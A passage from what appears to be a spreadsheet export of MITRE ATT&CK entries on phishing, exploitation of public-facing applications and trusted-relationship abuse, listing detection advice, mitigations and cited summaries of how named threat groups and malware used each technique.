[Snip3](https://attack.mitre.org/software/S1086) has been delivered to victims through malicious e-mail attachments.(Citation: Telefonica Snip3 December 2021)
Squirrelwaffle
[Squirrelwaffle](https://attack.mitre.org/software/S1030) has been distributed via malicious Microsoft Office documents within spam emails.(Citation: Netskope Squirrelwaffle Oct 2021)
Taidoor
[Taidoor](https://attack.mitre.org/software/S0011) has been delivered through spearphishing emails.(Citation: TrendMicro Taidoor)
ThreatNeedle
[ThreatNeedle](https://attack.mitre.org/software/S0665) has been distributed via a malicious Word document within a spearphishing email.(Citation: Kaspersky ThreatNeedle Feb 2021) 
TrickBot
[TrickBot](https://attack.mitre.org/software/S0266) has used an email with an Excel sheet containing a malicious macro to deploy the malware(Citation: TrendMicro Trickbot Feb 2019)
Valak
[Valak](https://attack.mitre.org/software/S0476) has been delivered via spearphishing e-mails with password protected ZIP files.(Citation: Unit 42 Valak July 2020)
WarzoneRAT
[WarzoneRAT](https://attack.mitre.org/software/S0670) has been distributed as a malicious attac</t>
  </si>
  <si>
    <t xml:space="preserve">Application Log Content
Monitor for third-party application logging, messaging, and/or other artifacts that may send spearphishing emails with a malicious link in an attempt to gain access to victim systems. Filtering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing) URL inspection within email (including expanding shortened links and identifying obfuscated URLs) can help detect links leading to known malicious sites.(Citation: Mandiant URL Obfuscation 2023) Detonation chambers can be used to detect these links and either automatically go to these sites to determine if they're potentially malicious, or wait and capture the content if a user visits the link.
Furthermore, monitor browser logs for homographs in ASCII and in internationalized domain names abusing different character sets (e.g. Cyrillic vs Latin versions of trusted sites).
Network Traffic Content
Monitor and analyze SSL/TLS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Furthermore, monitor network traffic for cloned sites as well as homographs via the use of internationalized domain names abusing different character sets (e.g. Cyrillic vs Latin versions of trusted sites). 
Network Traffic Flow
Monitor network data for uncommon data flows. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious.
Audit
Audit applications and their permissions to ensure access to data and resources are limited based upon necessity and principle of least privilege.
Restrict Web-Based Content
Determine if certain websites that can be used for spearphishing are necessary for business operations and consider blocking access if activity cannot be monitored well or if it poses a significant risk.
Software Configuration
Use anti-spoofing and email authentication mechanisms to filter messages based on validity checks of the sender domain (using SPF) and integrity of messages (using DKIM). Enabling these mechanisms within an organization (through policies such as DMARC) may enable recipients (intra-org and cross domain) to perform similar message filtering and validation.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing).
Furthermore, policies may enforce / install browser extensions that protect against IDN and homograph attacks.
User Account Management
Azure AD Administrators apply limitations upon the ability for users to grant consent to unfamiliar or unverified third-party applications. 
User Training
Users can be trained to identify social engineering techniques and spearphishing emails with malicious links which includes phishing for consent with OAuth 2.0. Additionally, users may perform visual checks of the domains they visit; however, homographs in ASCII and in IDN domains and URL schema obfuscation may render manual checks difficult. Phishing training and other cybersecurity training may raise awareness to check URLs before visiting the sites.
C0011
During [C0011](https://attack.mitre.org/campaigns/C0011), [Transparent Tribe](https://attack.mitre.org/groups/G0134) sent emails containing a malicious link to student targets in India.(Citation: Cisco Talos Transparent Tribe Education Campaign July 2022)
C0021
During [C0021](https://attack.mitre.org/campaigns/C0021), the threat actors sent phishing emails with unique malicious links, likely for tracking victim clicks.(Citation: FireEye APT29 Nov 2018)(Citation: Microsoft Unidentified Dec 2018)
Night Dragon
During [Night Dragon](https://attack.mitre.org/campaigns/C0002), threat actors sent spearphishing emails containing links to compromised websites where malware was downloaded.(Citation: McAfee Night Dragon)
Operation Dream Job
During [Operation Dream Job](https://attack.mitre.org/campaigns/C0022), [Lazarus Group](https://attack.mitre.org/groups/G0032) sent malicious OneDrive links with fictitious job offer advertisements via email.(Citation: ClearSky Lazarus Aug 2020)(Citation: ESET Lazarus Jun 2020)
Operation Dust Storm
During [Operation Dust Storm](https://attack.mitre.org/campaigns/C0016), the threat actors sent spearphishing emails containing a malicious link.(Citation: Cylance Dust Storm)
Operation Spalax
During [Operation Spalax](https://attack.mitre.org/campaigns/C0005), the threat actors sent phishing emails to victims that contained a malicious link.(Citation: ESET Operation Spalax Jan 2021)
APT1
[APT1](https://attack.mitre.org/groups/G0006) has sent spearphishing emails containing hyperlinks to malicious files.(Citation: Mandiant APT1)
APT28
[APT28](https://attack.mitre.org/groups/G0007) sent spearphishing emails which used a URL-shortener service to masquerade as a legitimate service and to redirect targets to credential harvesting sites.(Citation: DOJ GRU Indictment Jul 2018)(Citation: ESET Zebrocy May 2019)(Citation: US District Court Indictment GRU Oct 2018)(Citation: Secureworks IRON TWILIGHT Active Measures March 2017)
APT29
[APT29](https://attack.mitre.org/groups/G0016) has used spearphishing with a link to trick victims into clicking on a link to a zip file containing malicious files.(Citation: Mandiant No Easy Breach)(Citation: MSTIC NOBELIUM May 2021)(Citation: Secureworks IRON RITUAL USAID Phish May 2021)
APT3
[APT3](https://attack.mitre.org/groups/G0022) has sent spearphishing emails containing malicious links.(Citation: FireEye Clandestine Wolf)
APT32
[APT32](https://attack.mitre.org/groups/G0050) has sent spearphishing emails containing malicious links.(Citation: ESET OceanLotus)(Citation: Cybereason Oceanlotus May 2017)(Citation: FireEye APT32 April 2020)(Citation: Volexity Ocean Lotus November 2020)(Citation: Amnesty Intl. Ocean Lotus February 2021)
APT33
[APT33](https://attack.mitre.org/groups/G0064) has sent spearphishing emails containing links to .hta files.(Citation: FireEye APT33 Sept 2017)(Citation: Symantec Elfin Mar 2019)
APT39
[APT39](https://attack.mitre.org/groups/G0087) leveraged spearphishing emails with malicious links to initially compromise victims.(Citation: FireEye APT39 Jan 2019)(Citation: FBI FLASH APT39 September 2020)
BlackTech
[BlackTech](https://attack.mitre.org/groups/G0098) has used spearphishing e-mails with links to cloud services to deliver malware.(Citation: TrendMicro BlackTech June 2017)
Cobalt Group
[Cobalt Group](https://attack.mitre.org/groups/G0080) has sent emails with URLs pointing to malicious documents.(Citation: Talos Cobalt Group July 2018)(Citation: Secureworks GOLD KINGSWOOD September 2018)
Confucius
[Confucius](https://attack.mitre.org/groups/G0142) has sent malicious links to victims through email campaigns.(Citation: TrendMicro Confucius APT Aug 2021)
EXOTIC LILY
[EXOTIC LILY](https://attack.mitre.org/groups/G1011) has relied on victims to open malicious links in e-mails for execution.(Citation: Google EXOTIC LILY March 2022)
Earth Lusca
[Earth Lusca](https://attack.mitre.org/groups/G1006) has sent spearphishing emails to potential targets that contained a malicious link.(Citation: TrendMicro EarthLusca 2022)
Elderwood
[Elderwood](https://attack.mitre.org/groups/G0066) has delivered zero-day exploits and malware to victims via targeted emails containing a link to malicious content hosted on an uncommon Web server.(Citation: Symantec Elderwood Sept 2012)(Citation: CSM Elderwood Sept 2012)
Ember Bear
[Ember Bear](https://attack.mitre.org/groups/G1003) has sent spearphishing emails containing malicious links.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )
Evilnum
[Evilnum](https://attack.mitre.org/groups/G0120) has sent spearphishing emails containing a link to a zip file hosted on Google Drive.(Citation: ESET EvilNum July 2020)
FIN4
[FIN4](https://attack.mitre.org/groups/G0085) has used spearphishing emails (often sent from compromised accounts) containing malicious links.(Citation: FireEye Hacking FIN4 Dec 2014)(Citation: FireEye Hacking FIN4 Video Dec 2014)
FIN7
[FIN7](https://attack.mitre.org/groups/G0046) has conducted broad phishing campaigns using malicious links.(Citation: CrowdStrike Carbon Spider August 2021)
FIN8
[FIN8](https://attack.mitre.org/groups/G0061) has distributed targeted emails containing links to malicious documents with embedded macros.(Citation: FireEye Know Your Enemy FIN8 Aug 2016)
Kimsuky
[Kimsuky](https://attack.mitre.org/groups/G0094) has sent spearphishing emails containing a link to a document that contained malicious macros or took the victim to an actor-controlled domain.(Citation: EST Kimsuky April 2019)(Citation: Netscout Stolen Pencil Dec 2018)(Citation: KISA Operation Muzabi)
Lazarus Group
[Lazarus Group](https://attack.mitre.org/groups/G0032) has sent malicious links to victims via email.(Citation: Kaspersky ThreatNeedle Feb 2021)
LazyScripter
[LazyScripter](https://attack.mitre.org/groups/G0140) has used spam emails that contain a link that redirects the victim to download a malicious document.(Citation: MalwareBytes LazyScripter Feb 2021)
Leviathan
[Leviathan](https://attack.mitre.org/groups/G0065) has sent spearphishing emails with links, often using a fraudulent lookalike domain and stolen branding.(Citation: Proofpoint Leviathan Oct 2017)(Citation: CISA AA21-200A APT40 July 2021)
LuminousMoth
[LuminousMoth](https://attack.mitre.org/groups/G1014) has sent spearphishing emails containing a malicious Dropbox download link.(Citation: Kaspersky LuminousMoth July 2021)
Machete
[Machete](https://attack.mitre.org/groups/G0095) has sent phishing emails that contain a link to an external server with ZIP and RAR archives.(Citation: Cylance Machete Mar 2017)(Citation: ESET Machete July 2019)
Magic Hound
[Magic Hound](https://attack.mitre.org/groups/G0059) has sent malicious URL links through email to victims. In some cases the URLs were shortened or linked to Word documents with malicious macros that executed PowerShells scripts to download [Pupy](https://attack.mitre.org/software/S0192).(Citation: Secureworks Cobalt Gypsy Feb 2017)(Citation: ClearSky Kittens Back 3 August 2020)(Citation: Certfa Charming Kitten January 2021)(Citation: Microsoft Iranian Threat Actor Trends November 2021)
Mofang
[Mofang](https://attack.mitre.org/groups/G0103) delivered spearphishing emails with malicious links included.(Citation: FOX-IT May 2016 Mofang)
Molerats
[Molerats](https://attack.mitre.org/groups/G0021) has sent phishing emails with malicious links included.(Citation: Kaspersky MoleRATs April 2019)
MuddyWater
[MuddyWater](https://attack.mitre.org/groups/G0069) has sent targeted spearphishing e-mails with malicious links.(Citation: Anomali Static Kitten February 2021)(Citation: Trend Micro Muddy Water March 2021)
Mustang Panda
[Mustang Panda](https://attack.mitre.org/groups/G0129) has delivered malicious links to their intended targets.(Citation: McAfee Dianxun March 2021)
OilRig
[OilRig](https://attack.mitre.org/groups/G0049) has sent spearphising emails with malicious links to potential victims.(Citation: Unit 42 OopsIE! Feb 2018)
Patchwork
[Patchwork](https://attack.mitre.org/groups/G0040) has used spearphishing with links to deliver files with exploits to initial victims.(Citation: Symantec Patchwork)(Citation: TrendMicro Patchwork Dec 2017)(Citation: Unit 42 BackConfig May 2020)
Sandworm Team
[Sandworm Team](https://attack.mitre.org/groups/G0034) has crafted phishing emails containing malicious hyperlinks.(Citation: US District Court Indictment GRU Unit 74455 October 2020)
Sidewinder
[Sidewinder](https://attack.mitre.org/groups/G0121) has sent e-mails with malicious links often crafted for specific targets.(Citation: ATT Sidewinder January 2021)(Citation: Cyble Sidewinder September 2020)
TA2541
[TA2541](https://attack.mitre.org/groups/G1018) has used spearphishing e-mails with malicious links to deliver malware.  (Citation: Proofpoint TA2541 February 2022)(Citation: Telefonica Snip3 December 2021)
TA505
[TA505](https://attack.mitre.org/groups/G0092) has sent spearphishing emails containing malicious links.(Citation: Proofpoint TA505 Sep 2017)(Citation: Proofpoint TA505 Jan 2019)(Citation: Trend Micro TA505 June 2019)(Citation: Proofpoint TA505 October 2019)
Transparent Tribe
[Transparent Tribe](https://attack.mitre.org/groups/G0134) has embedded links to malicious downloads in e-mails.(Citation: Talos Oblique RAT March 2021)(Citation: Talos Transparent Tribe May 2021)
Turla
[Turla](https://attack.mitre.org/groups/G0010) attempted to trick targets into clicking on a link featuring a seemingly legitimate domain from Adobe.com to download their malware and gain initial access.(Citation: ESET Turla Mosquito Jan 2018)
Windshift
[Windshift](https://attack.mitre.org/groups/G0112) has sent spearphishing emails with links to harvest credentials and deliver malware.(Citation: SANS Windshift August 2018)
Wizard Spider
[Wizard Spider](https://attack.mitre.org/groups/G0102) has sent phishing emails containing a link to an actor-controlled Google Drive document or other free online file hosting services.(Citation: DHS/CISA Ransomware Targeting Healthcare October 2020)(Citation: DFIR Ryuk 2 Hour Speed Run November 2020)
ZIRCONIUM
[ZIRCONIUM](https://attack.mitre.org/groups/G0128) has used malicious links in e-mails to deliver malware.(Citation: Microsoft Targeting Elections September 2020)(Citation: Google Election Threats October 2020)(Citation: Zscaler APT31 Covid-19 October 2020)
AADInternals
[AADInternals](https://attack.mitre.org/software/S0677) can send "consent phishing" emails containing malicious links designed to steal users’ access tokens.(Citation: AADInternals Documentation)
AppleJeus
[AppleJeus](https://attack.mitre.org/software/S0584) has been distributed via spearphishing link.(Citation: CISA AppleJeus Feb 2021)
Bazar
[Bazar](https://attack.mitre.org/software/S0534) has been spread via emails with embedded malicious links.(Citation: Cybereason Bazar July 2020)(Citation: Zscaler Bazar September 2020)(Citation: CrowdStrike Wizard Spider October 2020)
Bumblebee
[Bumblebee](https://attack.mitre.org/software/S1039) has been spread through e-mail campaigns with malicious links.(Citation: Proofpoint Bumblebee April 2022)(Citation: Cybereason Bumblebee August 2022)
Emotet
[Emotet](https://attack.mitre.org/software/S0367) has been delivered by phishing emails containing links. (Citation: Trend Micro Banking Malware Jan 2019)(Citation: Kaspersky Emotet Jan 2019)(Citation: CIS Emotet Apr 2017)(Citation: Malwarebytes Emotet Dec 2017)(Citation: Symantec Emotet Jul 2018)(Citation: US-CERT Emotet Jul 2018)(Citation: Talos Emotet Jan 2019)(Citation: Talos Emotet Jan 2019)(Citation: Picus Emotet Dec 2018)
Grandoreiro
[Grandoreiro](https://attack.mitre.org/software/S0531) has been spread via malicious links embedded in e-mails.(Citation: IBM Grandoreiro April 2020)(Citation: ESET Grandoreiro April 2020)
GuLoader
[GuLoader](https://attack.mitre.org/software/S0561) has been spread in phishing campaigns using malicious web links.(Citation: Unit 42 NETWIRE April 2020)
Hancitor
[Hancitor](https://attack.mitre.org/software/S0499) has been delivered via phishing emails which contained malicious links.(Citation: Threatpost Hancitor)
Javali
[Javali](https://attack.mitre.org/software/S0528) has been delivered via malicious links embedded in e-mails.(Citation: Securelist Brazilian Banking Malware July 2020)
KOCTOPUS
[KOCTOPUS](https://attack.mitre.org/software/S0669) has been distributed as a malicious link within an email.(Citation: MalwareBytes LazyScripter Feb 2021)
Kerrdown
[Kerrdown](https://attack.mitre.org/software/S0585) has been distributed via e-mails containing a malicious link.(Citation: Amnesty Intl. Ocean Lotus February 2021)
Melcoz
[Melcoz](https://attack.mitre.org/software/S0530) has been spread through malicious links embedded in e-mails.(Citation: Securelist Brazilian Banking Malware July 2020)
NETWIRE
[NETWIRE](https://attack.mitre.org/software/S0198) has been spread via e-mail campaigns utilizing malicious links.(Citation: Unit 42 NETWIRE April 2020)
OutSteel
[OutSteel](https://attack.mitre.org/software/S1017) has been distributed through malicious links contained within spearphishing emails.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )
Pony
[Pony](https://attack.mitre.org/software/S0453) has been delivered via spearphishing emails which contained malicious links.(Citation: Malwarebytes Pony April 2016)	
QakBot
[QakBot](https://attack.mitre.org/software/S0650) has spread through emails with malicious links.(Citation: Trend Micro Qakbot May 2020)(Citation: Kroll Qakbot June 2020)(Citation: Trend Micro Qakbot December 2020)(Citation: ATT QakBot April 2021)(Citation: Kaspersky QakBot September 2021)(Citation: Group IB Ransomware September 2020)(Citation: Trend Micro Black Basta October 2022)
Saint Bot
[Saint Bot](https://attack.mitre.org/software/S1018) has been distributed through malicious links contained within spearphishing emails.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )
Snip3
[Snip3](https://attack.mitre.org/software/S1086) has been delivered to victims through e-mail links to malicious files.(Citation: Telefonica Snip3 December 2021)
SpicyOmelette
[SpicyOmelette](https://attack.mitre.org/software/S0646) has been distributed via emails containing a malicious link that appears to be a PDF document.(Citation: Secureworks GOLD KINGSWOOD September 2018)
Squirrelwaffle
[Squirrelwaffle](https://attack.mitre.org/software/S1030) has been distributed through phishing emails containing a malicious URL.(Citation: ZScaler Squirrelwaffle Sep 2021)
TrickBot
[TrickBot](https://attack.mitre.org/software/S0266) has been delivered via malicious links in phishing e-mails.(Citation: Cyberreason Anchor December 2019)
Valak
[Valak](https://attack.mitre.org/software/S0476) has been delivered via malicious links in e-mail.(Citation: SentinelOne Valak June 2020)
</t>
  </si>
  <si>
    <t xml:space="preserve">Application Log Content
Detecting software exploitation may be difficult depending on the tools available. Software exploits may not always succeed or may cause the exploited process to become unstable or crash. Web Application Firewalls may detect improper inputs attempting exploitation.
Network Traffic Content
Use deep packet inspection to look for artifacts of common exploit traffic, such as SQL injection strings or known payloads.
Application Isolation and Sandboxing
Application isolation will limit what other processes and system features the exploited target can access.
Exploit Protection
Web Application Firewalls may be used to limit exposure of applications to prevent exploit traffic from reaching the application.
Network Segmentation
Segment externally facing servers and services from the rest of the network with a DMZ or on separate hosting infrastructure.
Privileged Account Management
Use least privilege for service accounts will limit what permissions the exploited process gets on the rest of the system.
Update Software
Update software regularly by employing patch management for externally exposed applications.
Vulnerability Scanning
Regularly scan externally facing systems for vulnerabilities and establish procedures to rapidly patch systems when critical vulnerabilities are discovered through scanning and through public disclosure.(Citation: OWASP Top 10)
C0017
During [C0017](https://attack.mitre.org/campaigns/C0017), [APT41](https://attack.mitre.org/groups/G0096) exploited CVE-2021-44207 in the USAHerds application and CVE-2021-44228 in Log4j, as well as other .NET deserialization, SQL injection, and directory traversal vulnerabilities to gain initial access.(Citation: Mandiant APT41)
C0018
During [C0018](https://attack.mitre.org/campaigns/C0018), the threat actors exploited VMWare Horizon Unified Access Gateways that were vulnerable to several Log4Shell vulnerabilities, including CVE-2021-44228, CVE-2021-45046, CVE-2021-45105, and CVE-2021-44832.(Citation: Cisco Talos Avos Jun 2022)
C0027
During [C0027](https://attack.mitre.org/campaigns/C0027), [Scattered Spider](https://attack.mitre.org/groups/G1015) exploited CVE-2021-35464 in the ForgeRock Open Access Management (OpenAM) application server to gain initial access.(Citation: Crowdstrike TELCO BPO Campaign December 2022)
Night Dragon
During [Night Dragon](https://attack.mitre.org/campaigns/C0002), threat actors used SQL injection exploits against extranet web servers to gain access.(Citation: McAfee Night Dragon)
Operation CuckooBees
During [Operation CuckooBees](https://attack.mitre.org/campaigns/C0012), the threat actors exploited multiple vulnerabilities in externally facing servers.(Citation: Cybereason OperationCuckooBees May 2022)
Operation Wocao
During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors gained initial access by exploiting vulnerabilities in JBoss webservers.(Citation: FoxIT Wocao December 2019)
SolarWinds Compromise
During the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024), [APT29](https://attack.mitre.org/groups/G0016) exploited CVE-2020-0688 against the Microsoft Exchange Control Panel to regain access to a network.(Citation: Volexity SolarWinds)(Citation: Cybersecurity Advisory SVR TTP May 2021)
APT28
[APT28](https://attack.mitre.org/groups/G0007) has used a variety of public exploits, including CVE 2020-0688 and CVE 2020-17144, to gain execution on vulnerable Microsoft Exchange; they have also conducted SQL injection attacks against external websites.(Citation: US District Court Indictment GRU Oct 2018)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)
APT29
[APT29](https://attack.mitre.org/groups/G0016) has exploited CVE-2019-19781 for Citrix, CVE-2019-11510 for Pulse Secure VPNs, CVE-2018-13379 for FortiGate VPNs, and CVE-2019-9670 in Zimbra software to gain access.(Citation: Cybersecurity Advisory SVR TTP May 2021)(Citation: NCSC APT29 July 2020)
APT39
[APT39](https://attack.mitre.org/groups/G0087) has used SQL injection for initial compromise.(Citation: Symantec Chafer February 2018)
APT41
[APT41](https://attack.mitre.org/groups/G0096) exploited CVE-2020-10189 against Zoho ManageEngine Desktop Central, and CVE-2019-19781 to compromise Citrix Application Delivery Controllers (ADC) and gateway devices.(Citation: FireEye APT41 March 2020)
Axiom
[Axiom](https://attack.mitre.org/groups/G0001) has been observed using SQL injection to gain access to systems.(Citation: Novetta-Axiom)(Citation: Cisco Group 72)
BackdoorDiplomacy
[BackdoorDiplomacy](https://attack.mitre.org/groups/G0135) has exploited CVE-2020-5902, an F5 BIP-IP vulnerability, to drop a Linux backdoor. [BackdoorDiplomacy](https://attack.mitre.org/groups/G0135) has also exploited mis-configured Plesk servers.(Citation: ESET BackdoorDiplomacy Jun 2021)
BlackTech
[BlackTech](https://attack.mitre.org/groups/G0098) has exploited a buffer overflow vulnerability in Microsoft Internet Information Services (IIS) 6.0, CVE-2017-7269, in order to establish a new HTTP or command and control (C2) server.(Citation: TrendMicro BlackTech June 2017)
Blue Mockingbird
[Blue Mockingbird](https://attack.mitre.org/groups/G0108) has gained initial access by exploiting CVE-2019-18935, a vulnerability within Telerik UI for ASP.NET AJAX.(Citation: RedCanary Mockingbird May 2020)
Dragonfly
[Dragonfly](https://attack.mitre.org/groups/G0035) has conducted SQL injection attacks, exploited vulnerabilities CVE-2019-19781 and CVE-2020-0688 for Citrix and MS Exchange, and CVE-2018-13379 for Fortinet VPNs.(Citation: CISA AA20-296A Berserk Bear December 2020)
Earth Lusca
[Earth Lusca](https://attack.mitre.org/groups/G1006) has compromised victims by directly exploiting vulnerabilities of public-facing servers, including those associated with Microsoft Exchange and Oracle GlassFish.(Citation: TrendMicro EarthLusca 2022)
FIN13
[FIN13](https://attack.mitre.org/groups/G1016) has exploited known vulnerabilities such as CVE-2017-1000486 (Primefaces Application Expression Language Injection), CVE-2015-7450 (WebSphere Application Server SOAP Deserialization Exploit), CVE-2010-5326 (SAP NewWeaver Invoker Servlet Exploit), and EDB-ID-24963 (SAP NetWeaver ConfigServlet Remote Code Execution) to gain initial access.(Citation: Mandiant FIN13 Aug 2022)(Citation: Sygnia Elephant Beetle Jan 2022)
Fox Kitten
[Fox Kitten](https://attack.mitre.org/groups/G0117) has exploited known vulnerabilities in Fortinet, PulseSecure, and Palo Alto VPN appliances.(Citation: ClearkSky Fox Kitten February 2020)(Citation: Dragos PARISITE )(Citation: CrowdStrike PIONEER KITTEN August 2020)(Citation: CISA AA20-259A Iran-Based Actor September 2020)(Citation: ClearSky Pay2Kitten December 2020)
GALLIUM
[GALLIUM](https://attack.mitre.org/groups/G0093) exploited a publicly-facing servers including Wildfly/JBoss servers to gain access to the network.(Citation: Cybereason Soft Cell June 2019)(Citation: Microsoft GALLIUM December 2019)
GOLD SOUTHFIELD
[GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) has exploited Oracle WebLogic vulnerabilities for initial compromise.(Citation: Secureworks REvil September 2019)
HAFNIUM
[HAFNIUM](https://attack.mitre.org/groups/G0125) has exploited CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065  to compromise on-premises versions of Microsoft Exchange Server, enabling access to email accounts and installation of additional malware.(Citation: Microsoft HAFNIUM March 2020)(Citation: Volexity Exchange Marauder March 2021)(Citation: FireEye Exchange Zero Days March 2021)(Citation: Tarrask scheduled task)   
Ke3chang
[Ke3chang](https://attack.mitre.org/groups/G0004) has compromised networks by exploiting Internet-facing applications, including vulnerable Microsoft Exchange and SharePoint servers.(Citation: Microsoft NICKEL December 2021)
Kimsuky
[Kimsuky](https://attack.mitre.org/groups/G0094) has exploited various vulnerabilities for initial access, including Microsoft Exchange vulnerability CVE-2020-0688.(Citation: KISA Operation Muzabi)
Magic Hound
[Magic Hound](https://attack.mitre.org/groups/G0059) has exploited the Log4j utility (CVE-2021-44228), on-premises MS Exchange servers via "ProxyShell" (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207), and Fortios SSL VPNs (CVE-2018-13379).(Citation: Check Point APT35 CharmPower January 2022)(Citation: DFIR Report APT35 ProxyShell March 2022)(Citation: Cybereason PowerLess February 2022)(Citation: DFIR Phosphorus November 2021)(Citation: Microsoft Iranian Threat Actor Trends November 2021)
Moses Staff
[Moses Staff](https://attack.mitre.org/groups/G1009) has exploited known vulnerabilities in public-facing infrastructure such as Microsoft Exchange Servers.(Citation: Checkpoint MosesStaff Nov 2021)
MuddyWater
[MuddyWater](https://attack.mitre.org/groups/G0069) has exploited the Microsoft Exchange memory corruption vulnerability (CVE-2020-0688).(Citation: DHS CISA AA22-055A MuddyWater February 2022)
Rocke
[Rocke](https://attack.mitre.org/groups/G0106) exploited Apache Struts, Oracle WebLogic (CVE-2017-10271), and Adobe ColdFusion (CVE-2017-3066) vulnerabilities to deliver malware.(Citation: Talos Rocke August 2018)(Citation: Unit 42 Rocke January 2019)
Threat Group-3390
[Threat Group-3390](https://attack.mitre.org/groups/G0027) has exploited the Microsoft SharePoint vulnerability CVE-2019-0604 and CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065 in Exchange Server.(Citation: Trend Micro Iron Tiger April 2021)
Volatile Cedar
[Volatile Cedar](https://attack.mitre.org/groups/G0123) has targeted publicly facing web servers, with both automatic and manual vulnerability discovery.(Citation: CheckPoint Volatile Cedar March 2015) (Citation: ClearSky Lebanese Cedar Jan 2021) 
Volt Typhoon
[Volt Typhoon](https://attack.mitre.org/groups/G1017) gained initial access through exploitation of CVE-2021-40539 in internet-facing ManageEngine ADSelfService Plus servers.(Citation: Secureworks BRONZE SILHOUETTE May 2023)
menuPass
[menuPass](https://attack.mitre.org/groups/G0045) has leveraged vulnerabilities in Pulse Secure VPNs to hijack sessions.(Citation: Securelist APT10 March 2021)
Havij
[Havij](https://attack.mitre.org/software/S0224) is used to automate SQL injection.(Citation: Check Point Havij Analysis)
Siloscape
[Siloscape](https://attack.mitre.org/software/S0623) is executed after the attacker gains initial access to a Windows container using a known vulnerability.(Citation: Unit 42 Siloscape Jun 2021) 
SoreFang
[SoreFang](https://attack.mitre.org/software/S0516) can gain access by exploiting a Sangfor SSL VPN vulnerability that allows for the placement and delivery of malicious update binaries.(Citation: CISA SoreFang July 2016)
ZxShell
[ZxShell](https://attack.mitre.org/software/S0412) has been dropped through exploitation of CVE-2011-2462, CVE-2013-3163, and CVE-2014-0322.(Citation: Talos ZxShell Oct 2014)
sqlmap
[sqlmap](https://attack.mitre.org/software/S0225) can be used to automate exploitation of SQL injection vulnerabilities.(Citation: sqlmap Introduction)
</t>
  </si>
  <si>
    <t xml:space="preserve">Application Log Content
Monitor for third-party application logging, messaging, and/or other artifacts that may send spearphishing messages via third-party services in an attempt to gain access to victim systems.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Antivirus/Antimalware
Anti-virus can also automatically quarantine suspicious files.
Restrict Web-Based Content
Determine if certain social media sites, personal webmail services, or other service that can be used for spearphishing is necessary for business operations and consider blocking access if activity cannot be monitored well or if it poses a significant risk.
User Training
Users can be trained to identify social engineering techniques and spearphishing messages with malicious links.
Operation Dream Job
During [Operation Dream Job](https://attack.mitre.org/campaigns/C0022), [Lazarus Group](https://attack.mitre.org/groups/G0032) sent victims spearphishing messages via LinkedIn concerning fictitious jobs.(Citation: ClearSky Lazarus Aug 2020)(Citation: ESET Lazarus Jun 2020)
APT29
[APT29](https://attack.mitre.org/groups/G0016) has used the legitimate mailing service Constant Contact to send phishing e-mails.(Citation: MSTIC NOBELIUM May 2021)
Ajax Security Team
[Ajax Security Team](https://attack.mitre.org/groups/G0130) has used various social media channels to spearphish victims.(Citation: FireEye Operation Saffron Rose 2013)
CURIUM
[CURIUM](https://attack.mitre.org/groups/G1012) has used social media to deliver malicious files to victims.(Citation: Microsoft Iranian Threat Actor Trends November 2021)
Dark Caracal
[Dark Caracal](https://attack.mitre.org/groups/G0070) spearphished victims via Facebook and Whatsapp.(Citation: Lookout Dark Caracal Jan 2018)
EXOTIC LILY
[EXOTIC LILY](https://attack.mitre.org/groups/G1011) has used the e-mail notification features of legitimate file sharing services for spearphishing.(Citation: Google EXOTIC LILY March 2022)
FIN6
[FIN6](https://attack.mitre.org/groups/G0037) has used fake job advertisements sent via LinkedIn to spearphish targets.(Citation: Security Intelligence More Eggs Aug 2019)
Lazarus Group
[Lazarus Group](https://attack.mitre.org/groups/G0032) has used social media platforms, including LinkedIn and Twitter, to send spearphishing messages.(Citation: Google TAG Lazarus Jan 2021)
Magic Hound
[Magic Hound](https://attack.mitre.org/groups/G0059) used various social media channels (such as LinkedIn) as well as messaging services (such as WhatsApp) to spearphish victims.(Citation: SecureWorks Mia Ash July 2017)(Citation: Microsoft Phosphorus Mar 2019)(Citation: ClearSky Kittens Back 3 August 2020)
OilRig
[OilRig](https://attack.mitre.org/groups/G0049) has used LinkedIn to send spearphishing links.(Citation: FireEye APT34 July 2019)
Windshift
[Windshift](https://attack.mitre.org/groups/G0112) has used fake personas on social media to engage and target victims.(Citation: SANS Windshift August 2018)	
</t>
  </si>
  <si>
    <t xml:space="preserve">Application Log Content
Configuration management databases (CMDB) and other asset management systems may help with the detection of computer systems or network devices that should not exist on a network. Monitor logs for unexpected actions taken by any delegated administrator accounts.(Citation: Microsoft Nobelium Admin Privileges)
Logon Session Creation
Monitor for newly constructed logon behavior that may breach or otherwise leverage organizations who have access to intended victims.
Logon Session Metadata
Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).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from a trusted entity. Consider correlation with process monitoring and command line to detect anomalous processes execution and command line arguments associated to traffic patterns (e.g. monitor anomalies in use of files that do not normally initiate connections for respective protocol(s)).
Multi-factor Authentication
Require MFA for all delegated administrator accounts.(Citation: Microsoft Nobelium Admin Privileges)
Network Segmentation
Network segmentation can be used to isolate infrastructure components that do not require broad network access.
User Account Management
Properly manage accounts and permissions used by parties in trusted relationships to minimize potential abuse by the party and if the party is compromised by an adversary. In Office 365 environments, partner relationships and roles can be viewed under the “Partner Relationships” page.(Citation: Office 365 Partner Relationships)
SolarWinds Compromise
During the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024), [APT29](https://attack.mitre.org/groups/G0016) gained access through compromised accounts at cloud solution partners, and used compromised certificates issued by Mimecast to authenticate to Mimecast customer systems.(Citation: Cybersecurity Advisory SVR TTP May 2021)(Citation: CrowdStrike StellarParticle January 2022)
APT28
Once [APT28](https://attack.mitre.org/groups/G0007) gained access to the DCCC network, the group then proceeded to use that access to compromise the DNC network.(Citation: DOJ GRU Indictment Jul 2018)
APT29
[APT29](https://attack.mitre.org/groups/G0016) has compromised IT, cloud services, and managed services providers to gain broad access to multiple customers for subsequent operations.(Citation: MSTIC Nobelium Oct 2021)
